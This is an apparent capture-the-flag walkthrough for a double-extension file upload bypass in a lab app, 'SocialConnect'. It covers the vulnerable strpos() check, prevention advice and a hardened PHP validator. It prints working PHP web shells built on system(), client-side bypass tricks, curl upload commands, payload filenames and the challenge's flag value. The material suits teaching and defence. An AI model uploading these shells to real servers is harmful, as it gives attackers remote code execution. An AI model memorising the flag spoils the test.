
  • Daily Challenge
  • Released 07 Aug 2025

File Upload Bypass - Complete Solution Walkthrough

Understanding the Vulnerability

The SocialConnect platform's avatar upload validates filenames with a substring check: a name is accepted if .png, .jpg or .jpeg appears anywhere in it, rather than being required to end with one of those extensions. A double extension such as shell.png.php or avatar.jpg.php therefore passes the filter, and because the file is stored under the web root with its .php suffix intact, the web server executes it as PHP.

Step 1: Account Registration and Setup

  1. Access the application: Navigate to <target-ip> to access SocialConnect
  2. Register an account: Click 'Register' and create a new user account with any details
  3. Log in: Sign in with your newly created credentials
  4. Navigate to profile: Click 'Profile' in the navigation menu
  5. Examine upload functionality: Note the avatar upload section that accepts PNG and JPG files

Step 2: Creating the Web Shell

  1. Create a PHP web shell: Save this content as shell.png.php
<?php
// Minimal command shell: runs the value of ?cmd= with system() and shows the output.
if (isset($_GET['cmd'])) {
    echo "<pre>";
    echo "Command: " . htmlspecialchars($_GET['cmd']) . "\n";
    echo "Output:\n";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "<h2>Web Shell Active</h2>";
    echo "<p>Add ?cmd=COMMAND to execute commands</p>";
    echo "<p>Example: ?cmd=cat /home/flag.txt</p>";
    echo "<form method='GET'>";
    echo "Command: <input type='text' name='cmd' placeholder='cat /home/flag.txt'>";
    echo "<input type='submit' value='Execute'>";
    echo "</form>";
}
?>
  2. Alternative naming: You can also use avatar.jpg.php or a similar double extension; only the last extension decides how the server executes the file, so it must be .php

Step 3: Bypassing Client-Side File Restrictions

The file input has client-side restrictions: accept=".png,.jpg,.jpeg". You need to bypass this to select your .php file.

Method 1: Browser Developer Tools

  1. Open browser developer tools: Right-click on the file input and select "Inspect Element"
  2. Edit the HTML: Remove or modify the accept attribute:
# Original
<input type="file" class="form-control" id="avatar" name="avatar" accept=".png,.jpg,.jpeg" required="">

# Modified (remove accept attribute)
<input type="file" class="form-control" id="avatar" name="avatar" required="">
  3. Select your file: Now you can select your shell.png.php file

Method 2: Rename and Upload

  1. Rename temporarily: Rename shell.png.php to shell.png
  2. Upload the file: Select and upload the renamed file
  3. Intercept request: Use Burp Suite or browser dev tools to modify the filename in the POST request back to shell.png.php

Method 3: cURL Upload

# First, log in and save the session cookie (-c writes the cookie jar)
curl -c cookies.txt -d "username=youruser&password=yourpass" <target-ip>/login.php

# Upload the shell directly as multipart form data (-b sends the saved cookie).
# The field name "avatar" matches the form's file input; if the real form posts
# additional fields that the handler checks, add them with further -F options.
curl -b cookies.txt -F "avatar=@shell.png.php" <target-ip>/profile.php

Step 4: Uploading the Web Shell

  1. Upload the shell: Using one of the methods from Step 3, upload your shell.png.php file
  2. Bypass the filter: The server-side validation checks for .png in the filename, which passes because of 'shell.png.php'
  3. Complete upload: Click 'Upload Avatar' to upload the file
  4. Note the filename: The system will rename it to something like avatar_1_1234567890_shell.png.php

Step 5: Accessing the Web Shell

  1. Find your shell: Navigate to <target-ip>/uploads/avatars/
  2. Access uploaded file: Look for your uploaded file (it will have a timestamp and user ID in the name)
  3. Execute the shell: Click on your uploaded .php file or access it directly via URL
  4. Verify shell access: You should see the web shell interface

Step 6: Retrieving the Flag

  1. Execute flag command: Use the web shell to run: cat /home/flag.txt
  2. Alternative commands: Try these if needed:
# Direct flag read
cat /home/flag.txt

# Search for flag files
find / -name "*flag*" 2>/dev/null

# List home directory
ls -la /home/

# Current directory and permissions
pwd && whoami
Flag Location: /home/flag.txt
Flag: b14691a4-8b7f-4eb2-b1c8-8e9c53e36ffa

Alternative Exploitation Methods

Method 1: Different Double Extensions

shell.jpg.php
avatar.png.php
image.jpeg.php
profile.jpg.php5

Method 2: Simple Command Shell

Filename: cmd.png.php
Content:
<?php system($_GET['c']); ?>

Usage: cmd.png.php?c=cat /home/flag.txt

Understanding the Vulnerability Code

The vulnerable code in profile.php:

$allowedExtensions = ['png', 'jpg', 'jpeg'];
$hasValidExtension = false;

// Vulnerable: substring match, not a check of the final extension
foreach ($allowedExtensions as $ext) {
    if (strpos(strtolower($fileName), '.' . $ext) !== false) {
        $hasValidExtension = true;
        break;
    }
}

The flaw: strpos() returns the position of the first occurrence of '.png' anywhere in the filename, so for 'shell.png.php' it returns 5 rather than false and the check passes. Nothing inspects what the name ends with or what the file contains, and the upload is then written to /uploads/avatars/ with its original .php extension, where the web server hands it to the PHP interpreter.

Prevention Strategies

  • Proper extension validation: take only the final extension, e.g. pathinfo($fileName, PATHINFO_EXTENSION), lower-case it and compare it exactly against an allowlist; substring matching is never sufficient
  • MIME type checking: the Content-Type header is supplied by the client and can be set to image/png for any payload, so treat it only as a first filter, never as the decision
  • File content analysis: check the magic bytes (PNG: 89 50 4E 47 0D 0A 1A 0A; JPEG: FF D8 FF) or decode the image server-side with getimagesize()
  • Disable script execution: configure the web server so nothing under the upload directory is passed to the PHP interpreter (for Apache, php_admin_flag engine off inside a <Directory> block for the uploads path; for nginx, no PHP-FPM location covering /uploads/)
  • Store outside web root: keep uploaded files outside publicly accessible directories and serve them through a handler that sets a fixed image Content-Type
  • File renaming: always generate the stored name server-side (random token plus an extension taken from the allowlist) so the client-supplied name, including any .php suffix, never reaches the filesystem
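The following is an added example written for this walkthrough, not code from the SocialConnect lab's profile.php. It reproduces the vulnerable strpos() check from the previous section beside a hardened replacement that implements the extension, content and renaming controls listed above, then runs both on the filenames used in this challenge. The function names, the constructed temp files and the PHP 7.4+ requirement are this example's own assumptions.

```php
<?php
// Added example, not the lab's own code: the vulnerable strpos() check reproduced
// beside a hardened version, exercised on a table of filenames.
// Assumed: PHP >= 7.4; function names and the temp-file demo are hypothetical.
declare(strict_types=1);

const ALLOWED_EXTENSIONS = ['png', 'jpg', 'jpeg'];

// The check from profile.php: true if ".png"/".jpg"/".jpeg" occurs anywhere in
// the name, so "shell.png.php" passes.
function vulnerableHasValidExtension(string $fileName): bool
{
    foreach (ALLOWED_EXTENSIONS as $ext) {
        if (strpos(strtolower($fileName), '.' . $ext) !== false) {
            return true;
        }
    }
    return false;
}

// Hardened: only the LAST extension is considered, compared exactly.
function hasValidExtension(string $fileName): bool
{
    $ext = strtolower(pathinfo(basename($fileName), PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXTENSIONS, true);
}

// Content check: decide the type from magic bytes, not from the filename or
// the client-supplied Content-Type. Returns 'png', 'jpg' or null.
function sniffImageType(string $path): ?string
{
    $head = (string) file_get_contents($path, false, null, 0, 8);
    if (strncmp($head, "\x89PNG\r\n\x1a\n", 8) === 0) {
        return 'png';
    }
    if (strncmp($head, "\xFF\xD8\xFF", 3) === 0) {
        return 'jpg';
    }
    return null;
}

// Storage name built entirely server-side: the client's filename never reaches
// the filesystem, and the extension comes from the sniffed content.
function storedAvatarName(int $userId, string $sniffedType): string
{
    return sprintf('avatar_%d_%s.%s', $userId, bin2hex(random_bytes(8)), $sniffedType);
}

// Full validation as an upload handler would call it after move_uploaded_file()
// safety checks; returns the name to store under, or null if rejected.
function acceptAvatar(string $clientName, string $tmpPath, int $userId): ?string
{
    if (!hasValidExtension($clientName)) {
        return null;
    }
    $type = sniffImageType($tmpPath);
    if ($type === null) {
        return null;
    }
    return storedAvatarName($userId, $type);
}

// Demo table: the lab's payload names versus legitimate ones.
foreach (['shell.png.php', 'profile.jpg.php5', 'avatar.png', 'AVATAR.PNG', 'shell.php'] as $name) {
    printf("%-18s vulnerable=%-5s hardened=%s\n", $name,
        vulnerableHasValidExtension($name) ? 'PASS' : 'fail',
        hasValidExtension($name) ? 'PASS' : 'fail');
}

// Demo content check with constructed files: a PHP payload saved as "x.png"
// passes the extension check but is rejected by the magic-byte sniffer.
$tmp = tempnam(sys_get_temp_dir(), 'av');
file_put_contents($tmp, "<?php system(\$_GET['c']); ?>");
echo 'PHP payload named x.png: ', acceptAvatar('x.png', $tmp, 1) === null ? 'rejected' : 'ACCEPTED', "\n";
file_put_contents($tmp, "\x89PNG\r\n\x1a\n" . str_repeat("\0", 16));
$stored = acceptAvatar('x.png', $tmp, 1);
echo 'Real PNG header named x.png: ', $stored === null ? 'rejected' : "stored as $stored", "\n";
unlink($tmp);
```

Run it with php from the command line. The table shows every double-extension name from this walkthrough passing the vulnerable check and failing the hardened one, while the two legitimate names pass both. The second demo shows why the extension check alone is not enough: a payload named x.png clears it, and only the content check stops it. The stored name never contains anything the client chose, so even if a future bug let a bad extension through, it could not be written to disk.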

Challenge Summary

This file upload bypass challenge demonstrates a common but critical vulnerability in web applications. By exploiting inadequate file validation, attackers can upload web shells and gain remote code execution capabilities. The double extension technique shown here is frequently encountered in real-world penetration testing scenarios and highlights the importance of implementing robust file upload security measures.